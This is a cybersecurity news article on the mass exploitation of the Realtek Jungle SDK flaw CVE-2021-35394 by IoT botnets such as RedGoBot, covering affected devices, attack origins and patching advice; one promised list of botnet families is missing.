In the latter half of 2022, a significant number of cyber attacks utilizing a remote code execution vulnerability in Realtek Jungle SDK were reported. These attacks, numbering 134 million, aimed to compromise smart devices.
The vulnerability in question grants unauthorized access to affected devices, enabling attackers to execute code and gain complete control over them.
The vulnerability has been identified by the Unit 42 researchers as CVE-2021-35394, with a high severity rating of 9.8 out of 10, and has been targeted by various malicious actors.
Palo Alto Networks detected a significant increase in exploitation attempts for the vulnerability in question, tracked as accounting for more than 40% of all incidents, during the months of August to October in the previous year.
In total 190 models of devices were affected by the CVE-2021-35394, as hundreds of different types of devices use Realtek’s RTL8xxxx chips. And here below we have mentioned the susceptible ones:-
- Routers
- Residential gateways
- IP cameras
- Wi-Fi repeaters from 66 different manufacturers (Like Asus, Belkin, D-Link, Huawei, LG, Logitech, Netgear, ZTE, and Zyxel)
Vulnerability Profile
- CVE ID: CVE-2021-35394
- Base Score: 9.8
- Severity: Critical
- Description: Realtek Jungle SDK version v2.x up to v3.4.14B provides a diagnostic tool called ‘MP Daemon’ that is usually compiled as ‘UDPServer’ binary. The binary is affected by multiple memory corruption vulnerabilities and an arbitrary command injection vulnerability that can be exploited by remote unauthenticated attackers.
The Exploitation of the Vulnerability
The emergence of a powerful botnet malware, dubbed “RedGoBot,” was observed in the wild beginning in September 2022. While this malware specifically targets IoT devices that are vulnerable to CVE-2021-35394.
As a result of these attacks, three different types of payloads were delivered, and here below we have mentioned them:-
- An executable script that downloads malware to the target server by executing a shell command.
- An injectable command that writes and executes a binary payload.
- A command was injected into the server which caused the server to reboot.
There are several botnet malware families responsible for most of these attacks, and here they are mentioned below:-
In September, RedGoBot also exploited this vulnerability to conduct DDoS attacks. In addition to the flooding methods that the botnet supports, it is capable of performing DDoS attacks on the following protocols:-
- HTTP
- ICMP
- TCP
- UDP
- VSE
- OpenVPN
Attack Origins
In terms of the origins of the attack, there were more than thirty international regions involved. A 48.3% share of all attacks originate from the United States, making it the country that generates the most attacks.
There is no doubt that these countries are in the top seven countries from where security experts have observed threat actors participating in these attacks, including the following:-
- Vietnam
- Russia
- The Netherlands
- France
- Luxembourg
- Germany
On August 15, 2021, Realtek took action to address a number of critical security vulnerabilities, including the flaw identified as CVE-2021-35394.
Unfortunately, this vulnerability, along with others like CVE-2021-35395, was quickly targeted by malicious actors. As recently as December, botnets were still exploiting these vulnerabilities.
Recommendations
The high volume of attacks that have been observed leveraging CVE-2021-35394 is a clear indication that cybercriminals are actively seeking out vulnerabilities within a company’s supply chain.
These types of vulnerabilities can be challenging for individuals to detect and fix, highlighting the importance of supply chain security.
Here below we have mentioned the recommendations offered by the experts:-
- Implement robust security protections with Next-Generation Firewalls.
- Make sure to apply the patches regularly.
- Always keep the devices up-to-date with the latest upgrades.
- In case of infection apply a factory reset on the device.
Network Security Checklist – Download Free E-Book